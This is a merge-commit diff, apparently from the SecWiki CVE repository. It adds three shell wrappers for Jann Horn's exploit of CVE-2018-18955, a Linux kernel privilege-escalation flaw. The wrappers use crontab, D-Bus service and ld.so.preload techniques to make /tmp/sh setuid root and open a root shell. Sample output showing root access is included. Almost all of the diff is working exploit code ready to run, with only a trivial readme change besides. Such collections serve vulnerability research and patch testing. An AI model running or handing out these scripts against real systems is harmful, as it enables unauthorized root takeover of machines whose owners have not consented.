Merge pull request SecWiki#9 from CaledoniaProject/master

增加 CVE-2018-18955

Author: ourren

Diff for: 2018/CVE-2018-1000001/readme.md

@@ -7,3 +7,4 @@ In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpat
 * [CVE - CVE-2018-1000001](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000001)
 * [glibc - 'getcwd()' Local Privilege Escalation](https://www.exploit-db.com/exploits/43775/)
 * [glibc Realpath缓冲区下溢漏洞(CVE–2018–1000001)分析](http://www.freebuf.com/column/162202.html)
+

Diff for: 2018/CVE-2018-18955/exploit.cron.sh

@@ -0,0 +1,101 @@
+#!/bin/sh
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses crontab technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.cron.sh
+# [*] Compiling...
+# [*] Writing payload to /tmp/payload...
+# [*] Adding cron job... (wait a minute)
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh
+# [*] Cleaning up...
+# [!] Remember to clean up /etc/crontab
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+bootstrap="/tmp/payload"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+echo "[*] Writing payload to ${bootstrap}..."
+
+echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap
+/bin/chmod +x "${bootstrap}"
+
+echo "[*] Adding cron job... (wait a minute)"
+
+echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell
+sleep 60
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  /bin/rm "${bootstrap}"
+  exit 1
+fi
+
+echo '[+] Success:'
+ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm "${bootstrap}"
+/bin/rm subuid_shell
+/bin/rm subshell
+if command_exists /bin/sed; then
+  echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell
+else
+  echo "[!] Manual clean up of /etc/crontab required"
+fi
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
+

Diff for: 2018/CVE-2018-18955/exploit.dbus.sh

@@ -0,0 +1,146 @@
+#!/bin/sh
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses dbus service technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh
+# [*] Compiling...
+# [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [*] Launching dbus service...
+# Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Jan  4 18:31 /tmp/sh
+# [*] Cleaning up...
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+service="org.subuid.Service"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/dbus-send; then
+  echo '[-] dbus-send is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..."
+
+cat << EOF > "${service}.service"
+[D-BUS Service]
+Name=${service}
+Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}"
+User=root
+EOF
+
+echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell
+
+if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..."
+
+cat << EOF > "${service}.conf"
+<!DOCTYPE busconfig PUBLIC
+  "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
+  "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
+<busconfig>
+  <policy context="default">
+    <allow send_destination="${service}"/>
+  </policy>
+</busconfig>
+EOF
+
+echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell
+
+if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo "[*] Launching dbus service..."
+
+/usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}"
+
+sleep 1
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm subuid_shell
+/bin/rm subshell
+/bin/rm "${service}.conf"
+/bin/rm "${service}.service"
+echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell
+echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
+

Diff for: 2018/CVE-2018-18955/exploit.ldpreload.sh

@@ -0,0 +1,93 @@
+#!/bin/sh
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses ld.so.preload technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.ldpreload.sh
+# [*] Compiling...
+# [*] Adding libsubuid.so to /etc/ld.so.preload...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Nov 21 19:07 /tmp/sh
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+lib="libsubuid.so"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then
+  echo 'Compiling libsubuid.c failed'
+  exit 1
+fi
+
+echo "[*] Adding ${lib} to /etc/ld.so.preload..."
+
+echo "cp ${lib} /lib/; echo /lib/${lib} > /etc/ld.so.preload" | ./subuid_shell ./subshell
+
+/usr/bin/newuidmap
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm subuid_shell
+/bin/rm subshell
+echo "/bin/rm /lib/${lib}" | $rootshell
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
+